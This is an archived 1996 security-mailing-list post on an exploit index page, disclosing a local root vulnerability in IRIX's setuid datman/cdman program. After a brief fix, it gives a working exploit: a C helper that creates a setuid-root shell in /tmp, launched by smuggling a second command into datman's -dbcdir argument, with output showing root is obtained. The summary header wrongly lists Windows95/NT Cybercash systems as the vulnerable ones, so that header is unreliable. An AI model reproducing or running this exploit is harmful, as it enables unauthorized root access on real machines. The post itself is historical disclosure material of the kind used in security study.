dataman/cdman hole

Summary
Description:system() call vulnerability in the dataman program (cdman is a symlink to it) in IRIX
Author:Yuri Volobuev (volobuev@t1.chem.umn.edu)
Compromise: root
Vulnerable Systems:Windows95 and NT systems running Cybercash 2.1.2 or Verifone vPOS
Date:9 December 1996
Details

Exploit:


Yuri Volobuev (volobuev@t1.chem.umn.edu)
Mon, 9 Dec 1996 16:07:38 -0600 

Howdy,

ABSTRACT

/usr/sbin/datman, which is also invoked by running cdman, or double-clicking
on cdrom icon on the desktop, is suid and buggy.  It can be used by any
local user to obtain root privileges (contrary to previously published
information).  Both Irix 5.3 and 6.2 are vulnerable, if
dmedia_tools.sw.cddat subsystem is installed.

FIX

chmod -s /usr/sbin/datman

This will break it.  Another approach is to create a special group,
'console' or something like it, which only includes trusted people who have
physical access to the system and thus may need functionality of
cdman/datman, and only allow datman execution access to this group of
trusted people, but not to everybody.  This will reduce the risk, but as
long as program is root owned and suid, vulnerability is there.

ERRATA

As some of you may remember, few weeks ago I posted cdplayer exploit on
bugtraq. Among other things, it was saying

>(it will break it, but it's no big deal, there's a program called cdman,
>usually invoked by double-clicking CD ROM icon on the desktop, that does the
>same thing, only better, and it's not suid).

As some friendly fellow pointed out (sorry, I don't have his name, I lost
that message), this is an untrue.  /usr/sbin/cdman is just a symlink to
/usr/sbin/datman, which is indeed suid.  And, of course, one can get root
out of it, apparently with much less hassle than cdplayer, it was obvious
from the very first look at the datman file size (803Kb), from that moment
on it was just a matter of time.

I apologize for giving people false feeling of safety (not that people
should believe what I'm saying; but when what I'm saying is repeated by more
trustworthy organizations like AUSCERT, it's more dangerous).

If you are a busy person, move on to your next message now.

FULL STORY

I promised I'll stop cracking those defenseless suid programs (temporarily),
but few things made me step back on hacking path.  Most significantly, today
morning I came across AUSCERT advisory AA-96.11, which describes the
cdplayer problem.  I didn't know it was out.  It essentially repeats my
original post, but of course doesn't mention my name.  It'd be all right,
but what pisses me off is that they didn't even verify what I was saying.
What kind of service is that?  They charge people serious money for their
services, and after that most of their advisories just paraphrase original
exploits posted by other people, without giving them any credit, and they
apparently don't even double-check the information in the posts.  There are
not so many easy (and legal) ways to make money as good as that.  Do
nothing, repost other's work, collect cash.

Hey, AUSCERT, what makes you suggest people cdman as a safer way to play
cdroms?  Did you check if it is safe?  Did you spare half an hour to look
through the executable to see that it's as broken as cdplayer?  Too bad you
didn't, half an hour would be sufficient.

/usr/sbin/datman is essentially a fatter, more featured version of cdplayer
(or cdplayer is stripped down datman, whatever).  They do the same stuff in
regard to cd-rom databases.  However, datman calls setreuid(0, realuid) at
the very beginning, so uid stays 0, but euid is whatever user's uid is.
Interesting idea, it works in the sense that all created files are owned by
user, but it doesn't help much otherwise.

For backward compatibility reasons, upon startup datman looks for a file
.cdplayerrc in the home directory.  If it exists, and directory ~/.cddb
doesn't exists, it will ask if you want to convert .cdplayerrc to .cddb.  If
you answer yes, it will invoke /usr/sbin/cddbcvt, giving old and new
database names as arguments to it.  Using system().  What more can be said?

% cat > /tmp/makesh.c
main()
{
  seteuid(0); setegid(0);
  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
}
% cc /tmp/makesh.c -o /tmp/makesh
% mv .cddb .cddb.old
% touch .cdplayerrc
% /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
  Created "/tmp/blah"
Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah

% ls -l /tmp/sh
-r-sr-sr-x    1 root     sys       140784 Dec  9 15:24 /tmp/sh*

In above example, few dialog windows will pop up after starting datman.
Just press enter in each of them.  Make sure your DISPLAY is set correctly.

Note though you can pass arbitrary shell commands to sh in -dbcdir, these
commands will be executed with euid set to your uid, so seteuid(0) needs to
be called first.

A note to security folks everywhere.

People.  Why do you all ignore hackers?  Why try to keep face and pretend
hackers are not out there?  Why don't you give them a credit for their work?
Why don't you cooperate with them?

One may say that hackers are bad people, and don't deserve any recognition.
This is wrong.  Predators in nature represent a vital part of environment.
They serve many vital purposes, most importantly, they keep natural
selection going.  By killing weak they make animals get stronger and faster.
This doesn't mean a zebra should like the lioness that killed it. But
nevertheless, overall zebra community should be thankful to the fact that
lions exist.  Hackers are predators in computer world, often ruthless and
extremely dangerous.  But the very fact that they are out there makes entire
branch of computer industry, computer security, exist. Hackers make
developers design their programs better, and after all they are the reason
why the modern computer world is as secure as it is (whatever this means).

But even though developers have each and every right to hate hackers, why do
security folks dislike them?  These people are getting paid because of
hackers, hackers are the very reason for their positions existence, and
still only few smarter vendors have enough sense to at least admit the
problem disclosed by a hacker.  This is very sad.  Not only it's
disappointing, it ultimately may lead to some BAD things.

This exploit is dedicated to AUSCERT.

cheers,

yuri
Always speaking for myself and only for myself

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: